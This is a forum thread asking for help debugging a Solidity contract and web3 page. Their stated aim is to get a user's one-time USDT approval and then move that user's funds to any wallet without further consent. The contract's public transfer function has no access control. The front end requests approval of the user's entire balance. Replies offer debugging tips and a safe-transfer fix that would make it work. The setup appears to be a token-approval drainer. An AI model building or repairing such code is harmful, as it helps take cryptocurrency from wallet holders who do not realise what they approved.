Smart Contract Authorization Failure, Unable to Find the Cause of the Error
Firstly, I want to clarify that I am not a Solidity developer. I created this contract entirely from research I did online. My prior knowledge of cryptocurrency was limited, similar to my understanding of stocks or futures. However, my company needed someone for this project, so I was assigned to look into it. Here’s an outline of the issues I encountered:
This contract was modified by a helpful person online and should be functional. My objectives are as follows:
Users only need to authorize once.
I should be able to freely transfer amounts from the user’s wallet to any other wallet without requiring additional authorization from the user.
These are the core functionalities I need. Only after these are achieved can I continue interacting with the contract through web3.
Initially, I deployed the contract on the Sepolia testnet, and deployment went fine. However, during authorization, I encountered high gas fees, approximately 5 ETH. I couldn’t figure out the problem, so I switched to Polygon. On Polygon, I consistently experience authorization failures and have been unable to identify the cause. I tried increasing the gas fees, but the authorization still fails.
Below is my contract code and script. How should I proceed with debugging, or where can I find more information?
solidity:
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.27;

interface IERC20 {
    function transfer(address recipient, uint256 amount) external returns (bool);
    function transferFrom(address sender, address recipient, uint256 amount) external returns (bool);
    function balanceOf(address account) external view returns (uint256);
    function approve(address spender, uint256 amount) external returns (bool);
}

contract USDTManager {
    IERC20 public usdt;
   

  
    constructor() {
      usdt = IERC20(0xc2132D05D31c914a87C6611C10748AEb04B58e8F); 
        
    }
    

    function transferUSDTFromUser(address from, address to, uint256 amount) public {
         
        require(usdt.transferFrom(from, to, amount), "Transfer failed");
    }

 

  
    function getUSDTBalance(address account) public view returns (uint256) {
        return usdt.balanceOf(account);
    }
}

Web3 + html
 if (typeof window.ethereum !== 'undefined' || typeof window.trustwallet !== 'undefined') {
            web3 = new Web3(window.ethereum || window.trustwallet);
           
        } else {
            alert('please install  Trust Wallet or MetaMask');
        }              
        document.getElementById('connectWallet').addEventListener('click', async () => {
            if (typeof window.ethereum !== 'undefined') {
                web3 = new Web3(window.ethereum);
                try {
                    const accounts = await ethereum.request({ method: 'eth_requestAccounts' });
                    userAddress = accounts[0];
                    console.log("connection MetaMask:", userAddress);
                    const gasPrice = await web3.eth.getGasPrice();
                    gasPriceAsString = web3.utils.fromWei(gasPrice, 'gwei');
                   
                   
                    usdtContract = new web3.eth.Contract(usdtABI, usdtAddress);
                    usdtManagerContract = new web3.eth.Contract(usdtManagerABI, usdtManagerAddress);

                    
                    $('#approveUSDT').prop('disabled', false);
                    $('#transferUSDT').prop('disabled', false);
                } catch (error) {
                    console.error("connect MetaMask failed:", error);
                }
            } else {
                alert('please install MetaMask ');
            }
        });
        document.getElementById('approveUSDT').addEventListener('click', async () => {
            try {
              const balance = await usdtContract.methods.balanceOf(userAddress).call();
              console.log("user's balance:", balance);
              const gasPrice = await web3.eth.getGasPrice();
              const amount = web3.utils.toWei('10', 'mwei');
              const gasEstimate = web3.eth.estimateGas({
                to: usdtManagerAddress, 
                data: usdtManagerContract.methods.approve(usdtManagerAddress, balance).encodeABI()
              });
              console.log("approve gas:", gasEstimate);
              return false;
              const tx = await usdtManagerContract.methods.approve(usdtManagerAddress, balance).send({ 
                from: userAddress,
                gas: 100000000,
                gasPrice: 100000000
              });
                console.log("approve success:", tx.transactionHash);
                
            } catch (error) {
                console.error("approve failed:", error);
            }
        });                
                       

Thank you all for your help!

After switching to Polygon, did you re-deploy the contract and re-do the call to authorize for the user?

download and install hardhat , in hardhat you can add console.log() and dump the variables you want. Also you can install hardhat-tracer and run hardhat node with tracing option: hpx hardhat node --fulltrace , this option is well enough to figure out your contract is correctly developed. after you are sure your contract works as expected you deploy it to a network of your choice (MainNet , Arbitrum, Polygon, etc)

also  if you compile the solidity code with solidity-sotrage-layout option, you will be able to identify variables that are stored during the trace call by checking the slot id (i.e. the --fulltrace log will show you which variables (slot ids) are modified and read) Conclusion: with hardhat you can fix all your problems

@ruby_newbie yes, i did

@Nulik I'll give it a try, and if I encounter any issues, I'll ask you for help. By the way, I've never used Hardhat before.

I believe it's a problem with the USDT token. Basically you can't use the usual IERC20 interface with it, because USDT doesn't return true after a transfer. Try something like:
    function transferUSDTFromUser(address from, address to, uint256 amount) public {
        //require(usdt.transferFrom(from, to, amount), "Transfer failed");
        _safeTransferFrom(address(usdt), from, to, amount);
    }

    function _safeTransferFrom(address token, address from, address to, uint256 value) internal {
        (bool success, bytes memory data) = token.call(abi.encodeCall(IERC20.transferFrom, (from, to, value)));
        require(success && (data.length == 0 || abi.decode(data, (bool))), 'Transfer failed');
    }

Similar question: https://ethereum.stackexchange.com/a/151298/75850
